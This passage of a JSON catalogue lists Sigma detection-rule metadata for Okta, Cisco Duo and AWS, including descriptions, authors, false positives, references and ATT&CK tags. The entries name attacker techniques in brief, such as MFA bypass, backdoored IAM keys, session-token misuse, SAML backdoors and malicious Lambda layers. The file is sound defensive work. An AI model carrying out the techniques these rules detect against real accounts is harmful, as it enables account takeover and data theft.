"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "value": "Okta User Account Locked Out" }, { "description": "Detects when a Network Zone is Deactivated or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_network_zone_deactivated_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", "value": "Okta Network Zone Deactivated or Deleted" }, { "description": "Detects when Okta identifies new activity in the Admin Console.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual." 
], "filename": "okta_new_behaviours_admin_console.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "value": "Okta New Admin Console Behaviours" }, { "description": "Detects when Okta FastPass prevents a known phishing site.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2023-05-07", "falsepositive": [ "Unlikely" ], "filename": "okta_fastpass_phishing_detection.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://sec.okta.com/fastpassphishingdetection", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml" ], "tags": [ "attack.initial-access", "attack.t1566" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "value": "Okta FastPass Phishing Detection" }, { "description": "Detects when a new admin role assignment is created. 
Which could be a sign of privilege escalation or persistence", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate creation of a new admin role assignment" ], "filename": "okta_admin_role_assignment_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "value": "Okta Admin Role Assignment Created" }, { "description": "Detects when unauthorized access to app occurs.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "User might have believed that they had access." ], "filename": "okta_unauthorized_access_to_app.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "value": "Okta Unauthorized Access to App" }, { "description": "Detects when an Okta policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Okta Policies being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "okta_policy_modified_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "1667a172-ed4c-463c-9969-efd92195319a", "value": "Okta Policy Modified or Deleted" }, { "description": "Detects an attempt to deactivate or reset MFA for a user.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-21", "falsepositive": [ "If an MFA reset or deactivation was performed by a system administrator." ], "filename": "okta_mfa_reset_or_deactivated.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.defense-evasion", "attack.t1556.006" ] }, "related": [ { "dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", "value": "Okta MFA Reset or Deactivated" }, { "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "If a user requires an anonymising proxy due to valid justifications." 
], "filename": "okta_user_session_start_via_anonymised_proxy.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bde30855-5c53-4c18-ae90-1ff79ebc9578", "value": "Okta User Session Start Via An Anonymising Proxy Service" }, { "description": "Detects when a successful MFA authentication occurs due to the use of a bypass code.\nA bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) 
or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.\n", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2024-04-17", "falsepositive": [ "Legitimate user that was assigned on purpose to a bypass group" ], "filename": "cisco_duo_mfa_bypass_via_bypass_code.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://duo.com/docs/adminapi#logs", "https://help.duo.com/s/article/6327?language=en_US", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/cisco/duo/cisco_duo_mfa_bypass_via_bypass_code.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.initial-access" ] }, "uuid": "6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "value": "Cisco Duo Successful MFA Authentication Via Bypass Code" }, { "description": "Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC" ], "filename": "aws_cloudtrail_new_acl_entries.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "value": "New Network ACL Entry Added" }, { "description": "Identifies when an ElastiCache security 
group has been modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_elasticache_security_group_modified_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "value": "AWS ElastiCache Security Group Modified or Deleted" }, { "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. 
This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-12-13", "falsepositive": [ "Unknown" ], "filename": "aws_delete_identity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_delete_identity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20f754db-d025-4a8f-9d74-e0037e999a9a", "value": "SES Identity Has Been Deleted" }, { "description": "Detects AWS root account usage", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" ], "filename": "aws_root_account_usage.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_root_account_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "value": "AWS Root Credentials" }, { "description": "Identifies the suspicious use of GetSessionToken. 
Tokens could be created and used by attackers to move laterally and escalate privileges.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_sts_getsessiontoken_misuse.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1548", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", "value": "AWS STS GetSessionToken Misuse" }, { "description": "Detects when an account makes changes to the ingress or egress rules of a security group.\nThis can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.\n", "meta": { "author": 
"jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "New VPCs and Subnets being setup requiring a different security profile to those already defined", "A single port being opened for a new service that is known to be deploying", "Administrators closing unused ports to reduce the attack surface" ], "filename": "aws_cloudtrail_security_group_change_ingress_egress.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fb77778-040f-4015-9440-572aa9b6b580", "value": "Ingress/Egress Security Group Modification" }, { "description": "Detects possible suspicious glue development endpoint activity.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-03", "falsepositive": [ "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_passed_role_to_glue_development_endpoint.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "value": "AWS Glue Development Endpoint Activity" }, { "description": "Detects when an EFS Fileshare Mount is modified or deleted. An adversary deleting a mount target breaks access to the file system through that mount, which might disrupt instances or applications using those mounts.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", "value": "AWS EFS Fileshare Mount Modified or Deleted" }, { "description": "Detects the restoration of a new publicly accessible database instance from a snapshot. 
It may be a part of data exfiltration.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Unknown" ], "filename": "aws_rds_public_db_restore.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", "value": "Restore Public AWS RDS Instance" }, { "description": "Identifies when an EKS cluster is created or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "EKS Cluster being created or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_eks_cluster_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://any-api.com/amazonaws_com/eks/docs/API_Description", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "value": "AWS EKS Cluster Created or Deleted" }, { "description": "Detects the addition of a new network route to a route table in AWS.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "New VPC Creation requiring setup of a new route table", "New subnets added requiring routing setup" ], "filename": "aws_cloudtrail_new_route_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c803b2ce-c4a2-4836-beae-b112010390b1", "value": "New Network Route Added" }, { "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-22", "falsepositive": [ "Automated processes that uses Terraform may lead to false positives.", "SAML Provider could be updated by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_susp_saml_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml" ], "tags": [ "attack.initial-access", "attack.t1078", "attack.lateral-movement", "attack.t1548", "attack.privilege-escalation", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "value": "AWS Suspicious SAML Activity" }, { "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2023-01-06", "falsepositive": [ "Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity." 
], "filename": "aws_enum_buckets.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_enum_buckets.yml" ], "tags": [ "attack.discovery", "attack.t1580" ] }, "related": [ { "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f305fd62-beca-47da-ad95-7690a0620084", "value": "Potential Bucket Enumeration on AWS" }, { "description": "Detects S3 Browser utility creating IAM User or AccessKey.", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 Browser for IAM User and/or AccessKey creation" ], "filename": "aws_iam_s3browser_user_or_accesskey_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.009", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-d9d9-4792-91e5-133337c0ffee", "value": "AWS IAM S3Browser User or 
AccessKey Creation" }, { "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", "AWS API keys legitimate exchange workflows" ], "filename": "aws_iam_backdoor_users_keys.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "value": "AWS IAM Backdoor Users Keys" }, { "description": "Detects when an ElastiCache security group has been created.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_elasticache_security_group_created.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml" ], "tags": [ "attack.persistence", "attack.t1136", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "value": "AWS ElastiCache Security Group Created" }, { "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", "meta": { "author": "Elastic, Austin Songer @austinsonger", "creation_date": "2021-07-22", "falsepositive": [ "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_route_53_domain_transferred_lock_disabled.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "value": "AWS Route 53 Domain Transfer Lock Disabled" }, { "description": "Detects when a user attaches a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could use the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", "meta": { "author": "Austin Songer", "creation_date": "2021-09-23", "falsepositive": [ "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_attached_malicious_lambda_layer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_attached_malicious_lambda_layer.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "value": "AWS Attached Malicious Lambda Layer" }, { "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes, but volumes created afterwards in that region will be unencrypted unless encryption is explicitly requested at creation time.\n", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-29", "falsepositive": [ "System Administrator Activities", "DEV, UAT, SAT environments. You should apply this rule to PROD accounts only." ], "filename": "aws_ec2_disable_encryption.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml" ], "tags": [ "attack.impact", "attack.t1486", "attack.t1565" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "value": "AWS EC2 Disable EBS Encryption" }, { "description": "Detects when an EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will 
occur before deletion of a fileshare.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "aws_efs_fileshare_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", "value": "AWS EFS Fileshare Modified or Deleted" }, { "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", "Automated processes that uses Terraform may lead to false positives." 
